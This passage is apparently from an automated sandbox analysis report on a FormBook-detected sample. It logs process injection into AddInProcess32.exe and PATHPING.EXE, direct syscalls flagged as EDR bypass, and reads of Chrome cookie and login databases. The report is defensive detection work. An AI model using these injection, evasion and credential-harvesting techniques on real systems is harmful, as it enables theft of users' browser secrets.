              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AEEB20 mov eax, dword ptr fs:[00000030h]4_2_01AEEB20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AEEB20 mov eax, dword ptr fs:[00000030h]4_2_01AEEB20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B88B28 mov eax, dword ptr fs:[00000030h]4_2_01B88B28
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B88B28 mov eax, dword ptr fs:[00000030h]4_2_01B88B28
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3EB1D mov eax, dword ptr fs:[00000030h]4_2_01B3EB1D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3EB1D mov eax, dword ptr fs:[00000030h]4_2_01B3EB1D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3EB1D mov eax, dword ptr fs:[00000030h]4_2_01B3EB1D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3EB1D mov eax, dword ptr fs:[00000030h]4_2_01B3EB1D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3EB1D mov eax, dword ptr fs:[00000030h]4_2_01B3EB1D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3EB1D mov eax, dword ptr fs:[00000030h]4_2_01B3EB1D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3EB1D mov eax, dword ptr fs:[00000030h]4_2_01B3EB1D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3EB1D mov eax, dword ptr fs:[00000030h]4_2_01B3EB1D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3EB1D mov eax, dword ptr fs:[00000030h]4_2_01B3EB1D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ABCB7E mov eax, dword ptr fs:[00000030h]4_2_01ABCB7E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6EB50 mov eax, dword ptr fs:[00000030h]4_2_01B6EB50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B68B42 mov eax, dword ptr fs:[00000030h]4_2_01B68B42
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B56B40 mov eax, dword ptr fs:[00000030h]4_2_01B56B40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B56B40 mov eax, dword ptr fs:[00000030h]4_2_01B56B40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B8AB40 mov eax, dword ptr fs:[00000030h]4_2_01B8AB40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B74B4B mov eax, dword ptr fs:[00000030h]4_2_01B74B4B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B74B4B mov eax, dword ptr fs:[00000030h]4_2_01B74B4B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC8AA0 mov eax, dword ptr fs:[00000030h]4_2_01AC8AA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC8AA0 mov eax, dword ptr fs:[00000030h]4_2_01AC8AA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B16AA4 mov eax, dword ptr fs:[00000030h]4_2_01B16AA4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ACEA80 mov eax, dword ptr fs:[00000030h]4_2_01ACEA80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ACEA80 mov eax, dword ptr fs:[00000030h]4_2_01ACEA80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ACEA80 mov eax, dword ptr fs:[00000030h]4_2_01ACEA80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ACEA80 mov eax, dword ptr fs:[00000030h]4_2_01ACEA80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ACEA80 mov eax, dword ptr fs:[00000030h]4_2_01ACEA80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ACEA80 mov eax, dword ptr fs:[00000030h]4_2_01ACEA80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ACEA80 mov eax, dword ptr fs:[00000030h]4_2_01ACEA80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ACEA80 mov eax, dword ptr fs:[00000030h]4_2_01ACEA80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ACEA80 mov eax, dword ptr fs:[00000030h]4_2_01ACEA80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B94A80 mov eax, dword ptr fs:[00000030h]4_2_01B94A80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF8A90 mov edx, dword ptr fs:[00000030h]4_2_01AF8A90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFAAEE mov eax, dword ptr fs:[00000030h]4_2_01AFAAEE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFAAEE mov eax, dword ptr fs:[00000030h]4_2_01AFAAEE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC0AD0 mov eax, dword ptr fs:[00000030h]4_2_01AC0AD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B16ACC mov eax, dword ptr fs:[00000030h]4_2_01B16ACC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B16ACC mov eax, dword ptr fs:[00000030h]4_2_01B16ACC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B16ACC mov eax, dword ptr fs:[00000030h]4_2_01B16ACC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF4AD0 mov eax, dword ptr fs:[00000030h]4_2_01AF4AD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF4AD0 mov eax, dword ptr fs:[00000030h]4_2_01AF4AD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AEEA2E mov eax, dword ptr fs:[00000030h]4_2_01AEEA2E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFCA24 mov eax, dword ptr fs:[00000030h]4_2_01AFCA24
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFCA38 mov eax, dword ptr fs:[00000030h]4_2_01AFCA38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE4A35 mov eax, dword ptr fs:[00000030h]4_2_01AE4A35
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE4A35 mov eax, dword ptr fs:[00000030h]4_2_01AE4A35
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B4CA11 mov eax, dword ptr fs:[00000030h]4_2_01B4CA11
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFCA6F mov eax, dword ptr fs:[00000030h]4_2_01AFCA6F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFCA6F mov eax, dword ptr fs:[00000030h]4_2_01AFCA6F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFCA6F mov eax, dword ptr fs:[00000030h]4_2_01AFCA6F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3CA72 mov eax, dword ptr fs:[00000030h]4_2_01B3CA72
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3CA72 mov eax, dword ptr fs:[00000030h]4_2_01B3CA72
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6EA60 mov eax, dword ptr fs:[00000030h]4_2_01B6EA60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD0A5B mov eax, dword ptr fs:[00000030h]4_2_01AD0A5B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD0A5B mov eax, dword ptr fs:[00000030h]4_2_01AD0A5B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC6A50 mov eax, dword ptr fs:[00000030h]4_2_01AC6A50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC6A50 mov eax, dword ptr fs:[00000030h]4_2_01AC6A50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC6A50 mov eax, dword ptr fs:[00000030h]4_2_01AC6A50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC6A50 mov eax, dword ptr fs:[00000030h]4_2_01AC6A50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC6A50 mov eax, dword ptr fs:[00000030h]4_2_01AC6A50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC6A50 mov eax, dword ptr fs:[00000030h]4_2_01AC6A50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC6A50 mov eax, dword ptr fs:[00000030h]4_2_01AC6A50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF6DA0 mov eax, dword ptr fs:[00000030h]4_2_01AF6DA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE8DBF mov eax, dword ptr fs:[00000030h]4_2_01AE8DBF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE8DBF mov eax, dword ptr fs:[00000030h]4_2_01AE8DBF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B94DAD mov eax, dword ptr fs:[00000030h]4_2_01B94DAD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B88DAE mov eax, dword ptr fs:[00000030h]4_2_01B88DAE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B88DAE mov eax, dword ptr fs:[00000030h]4_2_01B88DAE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFCDB1 mov ecx, dword ptr fs:[00000030h]4_2_01AFCDB1
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\rFV23+17555.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and writeJump to behavior
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtQueryValueKey: Direct from: 0x76EF2BECJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtOpenKeyEx: Direct from: 0x76EF3C9CJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtClose: Direct from: 0x76EF2B6C
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\rFV23+17555.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\SysWOW64\PATHPING.EXE protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: NULL target: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: NULL target: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\SysWOW64\PATHPING.EXEThread register set: target process: 6772Jump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\PATHPING.EXEThread APC queued: target process: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\rFV23+17555.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 102E008Jump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeProcess created: C:\Windows\SysWOW64\PATHPING.EXE "C:\Windows\SysWOW64\PATHPING.EXE"Jump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: gxDswOWWlPEzerVr.exe, 00000006.00000002.3294974074.0000000001341000.00000002.00000001.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000006.00000000.2877196723.0000000001341000.00000002.00000001.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000008.00000002.3294969365.0000000001A31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
              Source: gxDswOWWlPEzerVr.exe, 00000006.00000002.3294974074.0000000001341000.00000002.00000001.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000006.00000000.2877196723.0000000001341000.00000002.00000001.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000008.00000002.3294969365.0000000001A31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: gxDswOWWlPEzerVr.exe, 00000006.00000002.3294974074.0000000001341000.00000002.00000001.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000006.00000000.2877196723.0000000001341000.00000002.00000001.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000008.00000002.3294969365.0000000001A31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: gxDswOWWlPEzerVr.exe, 00000006.00000002.3294974074.0000000001341000.00000002.00000001.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000006.00000000.2877196723.0000000001341000.00000002.00000001.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000008.00000002.3294969365.0000000001A31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\rFV23+17555.exeQueries volume information: C:\Users\user\Desktop\rFV23+17555.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.3293807088.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2952528062.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3295294820.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3295074777.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3294293351.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2955366160.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3295299661.0000000002990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
